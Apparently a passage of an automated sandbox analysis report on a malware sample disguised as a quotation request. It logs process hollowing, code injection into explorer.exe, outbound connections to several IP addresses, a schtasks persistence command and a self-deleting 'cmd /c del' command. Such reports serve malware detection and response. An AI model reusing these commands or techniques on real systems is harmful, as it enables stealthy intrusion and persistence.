          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03088ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FDF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0303A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03088D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03033540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03036DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03036DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03036DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03036DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03036DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03036DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03068DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0308740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0308740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0308740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03036C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03036C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03036C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03036C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0304C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0304C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038AC30 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00397310 SetUnhandledExceptionFilter,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00396FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\Desktop\Quotation Reques.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 194.9.94.85 80
          Source: C:\Windows\explorer.exeNetwork Connect: 77.72.1.202 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.133.87 80
          Source: C:\Windows\explorer.exeNetwork Connect: 194.59.164.34 80
          Source: C:\Windows\explorer.exeNetwork Connect: 138.197.103.178 80
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.46.143 80
          Source: C:\Windows\explorer.exeNetwork Connect: 51.83.43.226 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Quotation Reques.exeMemory written: C:\Users\user\Desktop\Quotation Reques.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Quotation Reques.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Quotation Reques.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Quotation Reques.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Quotation Reques.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Quotation Reques.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Quotation Reques.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 380000
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp'
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess created: C:\Users\user\Desktop\Quotation Reques.exe C:\Users\user\Desktop\Quotation Reques.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation Reques.exe'
          Source: explorer.exe, 00000007.00000000.271852974.0000000005EA0000.00000004.00000001.sdmp, cmd.exe, 00000010.00000002.497699646.00000000057B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.493320852.0000000001640000.00000002.00000001.sdmp, cmd.exe, 00000010.00000002.497699646.00000000057B0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.493320852.0000000001640000.00000002.00000001.sdmp, cmd.exe, 00000010.00000002.497699646.00000000057B0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000007.00000002.491976988.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000007.00000002.493320852.0000000001640000.00000002.00000001.sdmp, cmd.exe, 00000010.00000002.497699646.00000000057B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000007.00000002.493320852.0000000001640000.00000002.00000001.sdmp, cmd.exe, 00000010.00000002.497699646.00000000057B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Users\user\Desktop\Quotation Reques.exe VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
